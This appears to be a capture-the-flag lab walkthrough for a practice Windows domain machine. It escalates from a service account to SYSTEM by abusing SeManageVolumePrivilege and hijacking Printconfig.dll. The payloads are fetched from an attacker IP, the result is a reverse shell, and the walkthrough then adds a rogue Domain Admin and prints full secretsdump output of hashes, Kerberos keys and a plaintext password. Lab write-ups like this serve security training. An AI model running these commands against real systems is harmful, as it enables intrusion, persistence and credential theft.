InfoSec LAB

Access_Privilege_Escalation

Created: 3 min read

SeManageVolumePrivilege

It has been identified that the svc_mssql account has the SeManageVolumePrivilege privilege, which could be leveraged and abused for privilege escalation.

PS C:\tmp> mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.bak
mv : Access to the path is denied.
At line:1 char:1
+ mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Windows\Syst...Printconfig.dll:FileInfo) [Move-Item], Unauthorized 
   AccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand

Without the exploit, the C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll file cannot be modified

PS C:\tmp> iwr -Uri http://192.168.45.171/SeManageVolumeExploit.exe -OutFile .\SeManageVolumeExploit.exe

Delivering the exploit binary

PS C:\tmp> .\SeManageVolumeExploit.exe
Entries changed: 926
DONE

Executing the exploit

PS C:\tmp> mv C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll.bak

Now I can modify it

PS C:\tmp> iwr -Uri http://192.168.45.171/Printconfig.dll -OutFile C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll

Delivering the payload to replace the C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll file

PS C:\tmp> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS C:\tmp> $object = [Activator]::CreateInstance($type)

Initiating the PrintNotify object

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 1234
listening on [any] 1234 ...
 
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 50723
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>
C:\Windows\system32> whoami
 whoami
nt authority\system
 
C:\Windows\system32> hostname
 hostname
SERVER
 
C:\Windows\system32> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.224.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.224.254

System Level compromise

Hashdump

C:\Windows\system32> net user /ADD adm1n qwer1234 /DOMAIN && net group /DOMAIN "Domain Admins" /ADD adm1n
 
The command completed successfully.
The command completed successfully.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ impacket-secretsdump ACCESS.OFFSEC/adm1n@server.access.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: qwer1234
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85010ccdc73e309c2159bbc9d1ffdc16:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
ACCESS\SERVER$:aes256-cts-hmac-sha1-96:5e7219b3e854eff22e5f5228ddc9553841f48316e15f8cfa4d03c93e4c44462c
ACCESS\SERVER$:aes128-cts-hmac-sha1-96:3d79f0e486b3275fabf856a6441bdc61
ACCESS\SERVER$:des-cbc-md5:16c74a67527c8fb3
ACCESS\SERVER$:plain_password_hex:c38bd4f106525c28ea08e84cc2f7748f313af2077502967e69dcd7d56d60303fe3e99e8249f3457ec7a0f4922460739a77a86cf4ff5badba268902286619ec38f8a2f3adec71e25c92a6df6dab5ccaf9e34c617c918b96f630c700b6c07b9591f0510582feb9c0c1590f6c699e22aa67768a9487ac9d8fd76febdb501f66c596c033d529a3b08e18b697efb7297e273153af020804cae18b95a5b96486bb73d76944954e623f62b3dca8b9b8ad5cb1c11892783447ed99a0cf2806255e3a65ad1b62a7a9a03038426f7f46e102fdfc52eb143816616a4482d59255529c693334adee470a7bf3ce490bb816c80df705f8
ACCESS\SERVER$:aad3b435b51404eeaad3b435b51404ee:f1a773a1c32826f2c3062fff45be0c60:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM 
 0000   4A E2 C6 53 5D 77 02 C9  AE A9 48 23 7C 5B 46 39   J..S]w....H#|[F9
 0010   4A 56 02 3B CC 38 B8 C0  92 DD 41 2C 72 F2 63 46   JV.;.8....A,r.cF
 0020   71 36 1B E3 D2 BA E7 AC  8C BD E9 D5 55 36 C0 07   q6..........U6..
 0030   99 5A 11 4A 24 E4 42 E3  4C 12 3F F5 1B D7 D5 8C   .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] _SC_ApacheHTTPServer 
ACCESS\svc_apache:ServiceApache!!
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85010ccdc73e309c2159bbc9d1ffdc16:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:24e346a56bd63cab74d110e85d7c5c5e:::
svc_apache:1103:aad3b435b51404eeaad3b435b51404ee:d8f8fd2f7c065ffa8b66aa1792e3d1cf:::
svc_mssql:1104:aad3b435b51404eeaad3b435b51404ee:f773c5db7ddebefa4b0dae7ee8c50aea:::
adm1n:4102:aad3b435b51404eeaad3b435b51404ee:0a640404b5c386ab12092587fe19cd02:::
SERVER$:1000:aad3b435b51404eeaad3b435b51404ee:f1a773a1c32826f2c3062fff45be0c60:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:10e24acd9cdf678717cffe4f66bff5fd352f72f826173938182e074a6993a00e
Administrator:aes128-cts-hmac-sha1-96:c93c3ab2a4d4f0be96b51d1328af251e
Administrator:des-cbc-md5:e373a7a823a1b06e
krbtgt:aes256-cts-hmac-sha1-96:163b0a36f742494e26fab29171026daeab3af132a1c3b58ff64cdc5a890a66d4
krbtgt:aes128-cts-hmac-sha1-96:f1e1de9d95b8e67c0e48f38e8d40676b
krbtgt:des-cbc-md5:3d01a2ad2af22ac1
svc_apache:aes256-cts-hmac-sha1-96:7b2839f4f525256c7e1f67545da60dd5e39847885fe6786778906b107e179224
svc_apache:aes128-cts-hmac-sha1-96:d41731eea422d428c98bd435b2b47217
svc_apache:des-cbc-md5:86ef19490426921f
svc_mssql:aes256-cts-hmac-sha1-96:61080145689ad0218fdb826bf90ecf82dbd78eb4ab935a696436061319666dab
svc_mssql:aes128-cts-hmac-sha1-96:0e3969c49894b9e2d915553f90060095
svc_mssql:des-cbc-md5:01cd707c86d992ad
adm1n:aes256-cts-hmac-sha1-96:51cd1e96fda5c68ad5433e546fd2bb07a7d805c44279dd2f6991b60554199149
adm1n:aes128-cts-hmac-sha1-96:8f15bfc94f87eb2db1fe0e2fbb3c6e3b
adm1n:des-cbc-md5:460b9752a1b0a154
SERVER$:aes256-cts-hmac-sha1-96:5e7219b3e854eff22e5f5228ddc9553841f48316e15f8cfa4d03c93e4c44462c
SERVER$:aes128-cts-hmac-sha1-96:3d79f0e486b3275fabf856a6441bdc61
SERVER$:des-cbc-md5:a7892f085245b5f4
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Interactive Graph View

Backlinks